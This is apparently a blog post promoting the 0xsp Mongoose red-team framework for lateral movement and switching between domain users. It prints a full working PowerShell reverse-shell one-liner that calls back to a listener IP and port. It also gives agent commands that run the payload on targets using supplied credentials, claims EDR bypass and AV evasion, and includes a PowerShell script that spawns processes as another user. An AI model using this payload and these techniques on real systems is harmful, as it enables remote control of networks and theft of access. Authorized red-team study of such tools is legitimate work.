
In this blog post I am going to explain two of the unique features of 0xsp Mongoose that, I am sure, most red teamers have not yet explored. Take two minutes to read through them.

Lateral movement

Lateral movement refers to the techniques a cyber attacker uses, after gaining initial access, to move deeper into a network in search of sensitive data and other high-value assets. After entering the network, the attacker maintains ongoing access by moving through the compromised environment and obtaining increased privileges using various tools. (CrowdStrike)

While developing Mongoose Red, I was thinking about how to make this feature more useful by extending the lateral movement functionality. In my research I noticed that 50-60% of operators spend between 5 and 10 minutes achieving a lateral movement with their reverse shell, or executing the specific commands that give them access to a targeted system.

In this framework you don't need to spend that time. With bidirectional channel support, the red teamer grabs the one-liner backdoor from the C2 server and the agent delivers it, without having to type long commands into the WMI command line by hand.

How does Mongoose Red help?

  • Bypass EDR to conduct lateral movement
  • Weaponization of payload execution
  • Undetectable by AV
  • Fast  ⚡

Preparing the attack

First, save the desired payload in the Mongoose Node.js application by navigating to the Commands tab and pasting the one-liner there. In my case I am going to use the following PowerShell reverse shell: it connects back to 192.168.15.133 on port 4444, starts cmd.exe with redirected standard input and output, and relays both over the socket. Replace the IP and port with your own listener.

powershell.exe function cln{if($c.Connected -eq $true){$c.Close()};if($p.ExitCode -ne $null){$p.Close()};exit};$c=New-Object System.Net.Sockets.TcpClient;$c.Connect('192.168.15.133',4444);if($c.Connected -ne $true){cln};$s=$c.GetStream();$b=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=New-Object System.Text.AsciiEncoding;while($os.Peek()-ne -1){$o+=$e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;while($true){if($c.Connected -ne $true){cln};$pos=0;$i=1;while(($i -gt 0)-and($pos -lt $b.Length)){$read=$s.Read($b,$pos,$b.Length -$pos);$pos+=$read;if($pos -and($b[0..$($pos-1)]-contains 10)){break};if($pos -gt 0){$str=$e.GetString($b,0,$pos);$is.Write($str);Start-Sleep 1;if($p.ExitCode -ne $null){cln}else{$o=$e.GetString($os.Read());while($os.Peek()-ne -1){$o+=$e.GetString($os.Read());if($o -eq $str){$o=''}};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$str=$null}}else{cln}}};


After the payload and the listener are set up, the attack can be launched with the following arguments (the agent fetches the saved one-liner from the Node.js server given as -srvhost and executes it on the target with the supplied credentials).

agent.exe -lr -host targethost -username domainuser -password "HERE" -srvhost nodejs


Attacking Domain/Local users

One scenario you may face while conducting a red-team simulation in a Windows Active Directory environment is how to use the access level, or token, of another domain user. Typically, if you are working over RDP, you have to close your current RDP session and reconnect as that user to try their access level. That's not a good technique. There are other techniques we know of, but with 0xsp Mongoose you don't need that much effort.

We can quickly spawn another reverse shell under a different domain user's account with a simple command:

agent.exe -r username password cmd.exe domain
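For comparison, here is the same idea done by hand: spawning a process that carries another domain user's token while your own RDP session stays open. This is an added example, not the agent's own code; the domain, user name and password are placeholders. Start-Process -Credential calls CreateProcessWithLogonW, so the child process gets a fresh token for that user; the verification step at the end reads the owner of the new process back through WMI so you can confirm which identity it really runs as.

```powershell
# Added example (not 0xsp Mongoose code): what "-r username password cmd.exe domain"
# boils down to when done manually.
# Assumptions: placeholder account; that account must be allowed to log on
# interactively to this host, because CreateProcessWithLogonW performs an
# interactive (type 2) logon.
$Domain   = 'CORP'        # placeholder
$User     = 'otheruser'   # placeholder
$Password = 'HERE'        # placeholder

$secure = ConvertTo-SecureString $Password -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential("$Domain\$User", $secure)

# Spawn the shell as the other user. -WorkingDirectory must be readable by that user,
# otherwise the launch fails with "directory name is invalid".
$proc = Start-Process -FilePath 'cmd.exe' -Credential $cred -WorkingDirectory 'C:\' -PassThru

# Verify the token the new process actually received.
$owner = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.Id)" |
         Invoke-CimMethod -MethodName GetOwner
"PID $($proc.Id) runs as $($owner.Domain)\$($owner.User)"
```

To get a reverse shell rather than a console, pass the encoded powershell.exe command line from the previous section as -FilePath/-ArgumentList instead of cmd.exe. Note the audit trail: explicit-credential use logs a 4648 event and the new logon a 4624 with logon type 2 on the host, which is exactly what a SOC hunts for when looking for account switching inside an RDP session. If the other account is denied interactive logon, Start-Process cannot help; a /netonly-style logon (LOGON_NETCREDENTIALS_ONLY) is the alternative, and it is not exposed by this cmdlet.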


A few closing words

0xsp Mongoose is an open-source project; your contributions and the support you have shown are among the reasons that encourage me to push more updates and continue its development in the future.

Resources